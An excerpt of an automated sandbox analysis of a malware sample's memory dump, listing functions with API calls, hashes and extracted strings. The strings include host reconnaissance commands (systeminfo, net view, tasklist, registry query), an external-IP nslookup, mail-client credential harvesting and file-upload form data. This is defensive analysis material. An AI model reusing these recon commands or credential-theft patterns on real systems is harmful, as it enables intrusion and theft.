Opcode ID: 1be9098fdbe98211b90d77c69625258064224063a93b891fb4e82237bb93322d
Instruction ID: a11e09cc785df2f15f1f27feba8295e06083421475a7fd939b1c619861b2d657
Opcode Fuzzy Hash: 1be9098fdbe98211b90d77c69625258064224063a93b891fb4e82237bb93322d
Instruction Fuzzy Hash: 8F217C3290024AFFCF109FA0EC88F9E7BBDEF44314F148021F601AA5A1D7719A91DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001CAD2B, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?,001E0BB8,00000000), ref: 001CAD37
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001CAD55
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001CAD5D
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001CAD7B
GetLastError.KERNEL32 ref: 001CAD8F
RegCloseKey.ADVAPI32(?), ref: 001CAD9A
CloseHandle.KERNEL32(00000000), ref: 001CADA1
GetLastError.KERNEL32 ref: 001CADA9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 4d0bc808c6bdd209d13ceea0616d18d445d1f824b920125b3492968cae427e8d
Instruction ID: ef55970b08055d4ea59de8dc9d1f6d197656cafecd154ce6925f2536423ea4c9
Opcode Fuzzy Hash: 4d0bc808c6bdd209d13ceea0616d18d445d1f824b920125b3492968cae427e8d
Instruction Fuzzy Hash: C9110C75100149AFDB125FE0EC98FAD3B6EEF54356F504014FA0689A60DB71C994DB62

Uniqueness

Uniqueness Score: 0.71%

Function 001DB10A, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2ea2ea9ee241ff935cab75609278af1ca37fecfb92a8f35a39834f4b25b294b3
Instruction ID: c03ddb7291591bed76f27c562a15a5ec2360bf1883131bce518b88dddb369132
Opcode Fuzzy Hash: 2ea2ea9ee241ff935cab75609278af1ca37fecfb92a8f35a39834f4b25b294b3
Instruction Fuzzy Hash: 73A14671C04209EFDF22AFE4DC85AAEBBB5FF15314F11442AE412A6260D7319E95EF11

Uniqueness

Uniqueness Score: 0.00%

Function 001D187B, Relevance: 10.6, APIs: 7, Instructions: 125memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D18D4
lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D18F2
RtlAllocateHeap.NTDLL(00000000,779F6985,?), ref: 001D191B
memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D1932
HeapFree.KERNEL32(00000000,00000000), ref: 001D1945
memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D1954
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,001C221E,?,?,?), ref: 001D19B8

Part of subcall function 001C468D: RtlLeaveCriticalSection.NTDLL(?), ref: 001C470A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 0ed48155b1ace93d59cf681a55671b2112e015e57f94ec66c1e6e4734e76be1c
Instruction ID: c118adf82489cbb27040a58470349689d9b93dfc1f61f473650f3c41ceb76199
Opcode Fuzzy Hash: 0ed48155b1ace93d59cf681a55671b2112e015e57f94ec66c1e6e4734e76be1c
Instruction Fuzzy Hash: 2041BE31900218FFDF269FA4CC95B9E7BB9EF14358F11452AF804AB2A1C7709E50DB90

Uniqueness

Uniqueness Score: 100.00%

Function 001C91BE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125stringUNIQUE

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 001C91CE
StrChrA.SHLWAPI(00000000,?), ref: 001C91DF

Part of subcall function 001D1DE6: lstrlen.KERNEL32(?,00000000,?,00000001,001C62CA,00000000,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1DEF
Part of subcall function 001D1DE6: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1E12
Part of subcall function 001D1DE6: memset.NTDLL ref: 001D1E21

ExitProcess.KERNEL32 ref: 001C931F

Part of subcall function 001D52F7: StrChrA.SHLWAPI(?,?,00000000,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D531D
Part of subcall function 001D52F7: StrTrimA.SHLWAPI(?,001E2404,00000000,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D533C
Part of subcall function 001D52F7: StrChrA.SHLWAPI(?,?,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D534D
Part of subcall function 001D52F7: StrTrimA.SHLWAPI(00000001,001E2404,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D535F

lstrcmp.KERNEL32(-0000000C,mail), ref: 001C923C

Part of subcall function 001D9F28: FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D9FA6
Part of subcall function 001D9F28: lstrlenW.KERNEL32(?), ref: 001D9FC2
Part of subcall function 001D9F28: lstrlenW.KERNEL32(?), ref: 001D9FDA
Part of subcall function 001D9F28: lstrcpyW.KERNEL32(00000000,?), ref: 001D9FF3
Part of subcall function 001D9F28: lstrcpyW.KERNEL32(00000002), ref: 001DA008
Part of subcall function 001D9F28: FindNextFileW.KERNEL32(?,00000010), ref: 001DA030
Part of subcall function 001D9F28: FindClose.KERNEL32(00000002), ref: 001DA03E
Part of subcall function 001D9F28: FreeLibrary.KERNEL32(?), ref: 001DA050

Part of subcall function 001CFA3D: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CFA5C
Part of subcall function 001CFA3D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,001C927C,?), ref: 001CFA9A

Strings

/C pause dll, xrefs: 001C91ED
mail, xrefs: 001C9235

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Findlstrlen$FileFreeHeapTrimlstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcesslstrcmpmemcpymemset
String ID: /C pause dll$mail
API String ID: 3668845731-3657633402
Opcode ID: 8c64df632a7a98543bdc5f26d3a3c155586e08faa9ea265cafc573e6d8420cca
Instruction ID: 88b80eec6ab7fe59780f9e58a4b32bde1f0da1f11a19ca486a8c1529e935986e
Opcode Fuzzy Hash: 8c64df632a7a98543bdc5f26d3a3c155586e08faa9ea265cafc573e6d8420cca
Instruction Fuzzy Hash: 20415A71508340AFD710AFB4CC89E2FB7EAABA4350F10482DF195D65A1DB31D944DB22

Uniqueness

Uniqueness Score: 100.00%

Function 001D6BB9, Relevance: 10.6, APIs: 7, Instructions: 121threadstringUNIQUE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001D6BFA
GetWindowThreadProcessId.USER32(00000000,?), ref: 001D6C28
GetWindowThreadProcessId.USER32(?,?), ref: 001D6C6D
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001D6C95
_strupr.NTDLL ref: 001D6CC0
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 001D6CCD
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 001D6CE2

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID:
API String ID: 3831658075-0
Opcode ID: 13bfa6839a14f04795a7f169ac36a81ab4774d2ec8a843a84a924063488e1d57
Instruction ID: 7cd550b47b6ce10718912749b5e9ab693f305b1131518712406f7f18efd684d0
Opcode Fuzzy Hash: 13bfa6839a14f04795a7f169ac36a81ab4774d2ec8a843a84a924063488e1d57
Instruction Fuzzy Hash: 8C413C71D00259EBDF219FE5DC89BDDBBB9FB08701F104056F640A61A0DBB49A80CFA0

Uniqueness

Uniqueness Score: 100.00%

Function 001CA310, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D5E74: VirtualProtect.KERNEL32(?,?,0000000100000040,00000001,?,?,00000000,?,?,779F5520,001C6A04), ref: 001D5E99
Part of subcall function 001D5E74: GetLastError.KERNEL32(?,00000000,?,?,779F5520,001C6A04), ref: 001D5EA1
Part of subcall function 001D5E74: VirtualQuery.KERNEL32(?,?,000000010000001C,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EB8
Part of subcall function 001D5E74: VirtualProtect.KERNEL32(?,?,BD3F7BD2,00000001,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EDD

GetLastError.KERNEL32(00000000,00000004,?,?,?,00000000,001C84A5,001E2628,0000001C,001DF5C4,00000002,?,00000001,?,001E5A18,?), ref: 001CA469

Part of subcall function 001DF5E3: lstrlen.KERNEL32(04C2C95B,001C6A04,779F5520,001C6A04), ref: 001DF61B
Part of subcall function 001DF5E3: lstrcpy.KERNEL32(00000000,04C2C95B), ref: 001DF632
Part of subcall function 001DF5E3: StrChrA.SHLWAPI(00000000,0000002E), ref: 001DF63B
Part of subcall function 001DF5E3: GetModuleHandleA.KERNEL32(00000000), ref: 001DF659

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,04C2C95B,?,00000001,00000000,00000004,?,?,?), ref: 001CA3E7
VirtualProtect.KERNEL32(?,00000004,?,?,?,00000001,00000000,00000004,?,?,?,00000000,001C84A5,001E2628,0000001C,001DF5C4), ref: 001CA402
RtlEnterCriticalSection.NTDLL(001E6340), ref: 001CA426
RtlLeaveCriticalSection.NTDLL(001E6340), ref: 001CA444

Part of subcall function 001D5E74: SetLastError.KERNEL32(?,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EE6

Strings

, xrefs: 001CA3D6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: e62d1dedd2a3229b723bf9b79081d9e33a014d56670aed2fd0b7edfe91797f33
Instruction ID: 3392478bb9cae9fe2284762c9ca8a399026189c1a83d48d904ecd3a6a7846403
Opcode Fuzzy Hash: e62d1dedd2a3229b723bf9b79081d9e33a014d56670aed2fd0b7edfe91797f33
Instruction Fuzzy Hash: CF418171900619EFCB15DFA9C888E9DBBB8FF18314F448119F915AB650C770EA50CF91

Uniqueness

Uniqueness Score: 10.55%

Function 001D0E00, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E22
lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E33
lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E45
lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E57
lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E69
lstrlenW.KERNEL32(?,779F69A0,001E144A,00000000), ref: 001D0E75

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 001D0EF8

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: 35476f16a633ca231f374d360f0e16a890e9ee5b39b48302ae9994e5c695d41d
Instruction ID: deed6d208e5e736edd66d3bd338c003ab883fd4d9c94800118bd02621435cb36
Opcode Fuzzy Hash: 35476f16a633ca231f374d360f0e16a890e9ee5b39b48302ae9994e5c695d41d
Instruction Fuzzy Hash: E841F871E00609AFCB25DFA9C880AAFB7F9AF98304F258D2EE515E3311D774E9448B50

Uniqueness

Uniqueness Score: 2.59%

Function 001DD577, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C6B70: lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C6B94
Part of subcall function 001C6B70: StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 001C6C20
Part of subcall function 001C6B70: HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 001C6C3D
Part of subcall function 001C6B70: DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001C6C45
Part of subcall function 001C6B70: HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001C6C54

StrChrA.SHLWAPI(?,0000003A,00000000,00000000,77A4F730,00000000,00000000,00000000,?,?,?,001D1F4E), ref: 001DD62D
HeapFree.KERNEL32(00000000,?,00000000,00000000,77A4F730,00000000,00000000,00000000,?,?,?,001D1F4E), ref: 001DD641
StrTrimA.SHLWAPI(?, ,?,?,00000000,77A4F730,00000000,00000000,00000000,?,?,?,001D1F4E), ref: 001DD66E
lstrlen.KERNEL32(?,?,?,?,001D1F4E), ref: 001DD677
HeapFree.KERNEL32(00000000,?,?,?,?,001D1F4E), ref: 001DD691

Part of subcall function 001DC183: memset.NTDLL ref: 001DC1B2
Part of subcall function 001DC183: lstrlen.KERNEL32(00000000), ref: 001DC1C2
Part of subcall function 001DC183: strcpy.NTDLL ref: 001DC1D9
Part of subcall function 001DC183: StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 001DC1E3

Strings

, xrefs: 001DD666

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap$lstrlen$Trim$DeleteFilememsetstrcpy
String ID:
API String ID: 1047761332-3688684798
Opcode ID: 0f4f558de3f434f2fb68e904802fb196eb4ddd290c11ed360ba2e81c16187230
Instruction ID: 67c7765c7bb230934146d0843e10f13f0e3b85760775cc0c93f432fa2119c9ad
Opcode Fuzzy Hash: 0f4f558de3f434f2fb68e904802fb196eb4ddd290c11ed360ba2e81c16187230
Instruction Fuzzy Hash: A131C372A00145ABDF345BD4EDD59BD76BADF40348B28403BE209E6AA0DF39CD81DA91

Uniqueness

Uniqueness Score: 100.00%

Function 001CD382, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001CD404
lstrcpy.KERNEL32(00000000,grabs=), ref: 001CD416
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001CD423
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 001CD435
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 001CD466

Strings

grabs=, xrefs: 001CD410, 001CD430

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: a12c6e4a4130bc2b84f6183bf6542930c37a4bbe0d692e7070a17204ad5d9808
Instruction ID: b4fa7e21d371317d6481a7fb80a7f04816aa345fecd2cb7d84f48731aa58e3ce
Opcode Fuzzy Hash: a12c6e4a4130bc2b84f6183bf6542930c37a4bbe0d692e7070a17204ad5d9808
Instruction Fuzzy Hash: 69319672900249BFCB159FA5DC89EEF7BB9EF54360F008028FA1496651E774EA50CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001DD85D, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(001DAF1C,00000000,779F5520,?,?,?,001DAF1C,00000126,00000000,779F551B,00000000), ref: 001DD88D
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001DD8A3
memcpy.NTDLL(00000010,001DAF1C,00000000,?,?,001DAF1C,00000126,00000000), ref: 001DD8D9
memcpy.NTDLL(00000010,00000000,00000126,?,?,001DAF1C,00000126), ref: 001DD8F4
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 001DD912
GetLastError.KERNEL32(?,?,001DAF1C,00000126), ref: 001DD91C
HeapFree.KERNEL32(00000000,00000000,?,?,001DAF1C,00000126), ref: 001DD942

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: 7b4311dc19e1c467c04af0d58a4923f5328fc4995e6fc65b138b9fc5bc212dbf
Instruction ID: 55815da822879f2d3bfc4dbbd3f47edfef7591a81b0bcf7a34a2fb5707da6e56
Opcode Fuzzy Hash: 7b4311dc19e1c467c04af0d58a4923f5328fc4995e6fc65b138b9fc5bc212dbf
Instruction Fuzzy Hash: 4931DD36900209BFCB21CFA4EC84A9F7BB8EB04364F00442AFA05D6261D7319A84DBA0

Uniqueness

Uniqueness Score: 0.96%

Function 001D1AE6, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 89memoryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 001D1BBC

Strings

tasklist.exe /SVC >, xrefs: 001D1B54
net view >, xrefs: 001D1B28
driverquery.exe >, xrefs: 001D1B6A
systeminfo.exe , xrefs: 001D1B09
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 001D1B80
nslookup 127.0.0.1 >, xrefs: 001D1B3E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe $tasklist.exe /SVC >
API String ID: 3485239229-3676109661
Opcode ID: bcb21b081bce3d80f32d84bb336c50368db5ad2ff0ecf51fbc8c433672af176f
Instruction ID: 34a05229cccf100ca27ecd681a3af6cbc2c747f323a55e277c4ea68b42b6c98a
Opcode Fuzzy Hash: bcb21b081bce3d80f32d84bb336c50368db5ad2ff0ecf51fbc8c433672af176f
Instruction Fuzzy Hash: 93114B33E01AB6379631259A8C45D6F68A99B92F5170F026FBD507B385E796CC40C1F1

Uniqueness

Uniqueness Score: 100.00%

Function 001D4EDC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7C2E: RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C7C36
Part of subcall function 001C7C2E: RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C7C4B
Part of subcall function 001C7C2E: InterlockedIncrement.KERNEL32(0000001C), ref: 001C7C64

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 001D4F0C
memcpy.NTDLL(00000000,?,?), ref: 001D4F1D
lstrcmpi.KERNEL32(00000002,?), ref: 001D4F63
memcpy.NTDLL(00000000,?,?), ref: 001D4F77
HeapFree.KERNEL32(00000000,00000000,Blocked), ref: 001D4FB6

Strings

Blocked, xrefs: 001D4EE5, 001D4F9A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: e6c8d009f2484df5f3dffdf04c49132b4f70705638cdd05d279bd5c3ba58994f
Instruction ID: 1f5de1905b9eb10df213fb41ccce26b46c8abe627c93f501f125fe9b2fbafcfe
Opcode Fuzzy Hash: e6c8d009f2484df5f3dffdf04c49132b4f70705638cdd05d279bd5c3ba58994f
Instruction Fuzzy Hash: AC21AE72900219BFDF109FA8DCC9A9E7BB9EB25354F14402AF905A6360E7758D80CB90

Uniqueness

Uniqueness Score: 100.00%

Function 001DD951, Relevance: 10.6, APIs: 7, Instructions: 76memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(001C68BA,00000000,001E6360,001E6380,?,?,001C68BA,001C2B5E,001E6360), ref: 001DD961
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001DD977
lstrlen.KERNEL32(001C2B5E,?,?,001C68BA,001C2B5E,001E6360), ref: 001DD97F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001DD98B
lstrcpy.KERNEL32(001E6360,001C68BA), ref: 001DD9A1
HeapFree.KERNEL32(00000000,00000000,?,?,001C68BA,001C2B5E,001E6360), ref: 001DD9F5
HeapFree.KERNEL32(00000000,001E6360,?,?,001C68BA,001C2B5E,001E6360), ref: 001DDA04

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: ed48bbfe7c201937f23922f7372c4d5e876b1915616cce52e196eeb9b1ab09b2
Instruction ID: d21aade9268a7a77b5bc94402805627943a565e5d6545cd14bba5da76a11e59a
Opcode Fuzzy Hash: ed48bbfe7c201937f23922f7372c4d5e876b1915616cce52e196eeb9b1ab09b2
Instruction Fuzzy Hash: EE212932104284BFEB224FA8EC94F6E7FAAEB46718F14405AF5845B2A1C7729C81C760

Uniqueness

Uniqueness Score: 100.00%

Function 001CCC30, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,77A38170,00000000,?,001D0BBA,00000000,?,?,?), ref: 001CCC50

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

wsprintfA.USER32 ref: 001CCC7A

Part of subcall function 001D9B95: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,001CB505), ref: 001D9BAB
Part of subcall function 001D9B95: wsprintfA.USER32 ref: 001D9BD3
Part of subcall function 001D9B95: lstrlen.KERNEL32(?), ref: 001D9BE2
Part of subcall function 001D9B95: wsprintfA.USER32 ref: 001D9C22
Part of subcall function 001D9B95: wsprintfA.USER32 ref: 001D9C57
Part of subcall function 001D9B95: memcpy.NTDLL(00000000,?,?), ref: 001D9C64
Part of subcall function 001D9B95: memcpy.NTDLL(00000008,001E2408,00000002,00000000,?,?), ref: 001D9C79
Part of subcall function 001D9B95: wsprintfA.USER32 ref: 001D9C9C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001CCCEF

Part of subcall function 001E01AB: RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001E01C1
Part of subcall function 001E01AB: RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001E01DC

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 001CCCD7
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001CCCE3

Strings

Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 001CCC74
Content-Type: application/octet-stream, xrefs: 001CCC6C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: 8fc03eb7ed7f740ba1bcea351d8c72e90c91621dfaa09a3ef460cfba9c4122bc
Instruction ID: 8e736db499f967a7585cebdbe23f73fefd229403d24cb5b3c63f0e79fbb3bb1c
Opcode Fuzzy Hash: 8fc03eb7ed7f740ba1bcea351d8c72e90c91621dfaa09a3ef460cfba9c4122bc
Instruction Fuzzy Hash: DF213C76800289BBCF129F95DC44CCFBFB9FF58350F004516F924A6161D7B18A60DBA1

Uniqueness

Uniqueness Score: 2.59%

Function 001D77B6, Relevance: 10.6, APIs: 7, Instructions: 71filememoryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,?,00000080,00000000,001C5A1F,00000000,00001ED2,00000000,000000B7,?,?,001C5A1F,00000000), ref: 001D77F7
HeapFree.KERNEL32(00000000,00000000,001C5A1F,00000000,00001ED2,00000000,000000B7,?,?,001C5A1F,00000000,00000000,00000011), ref: 001D786A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

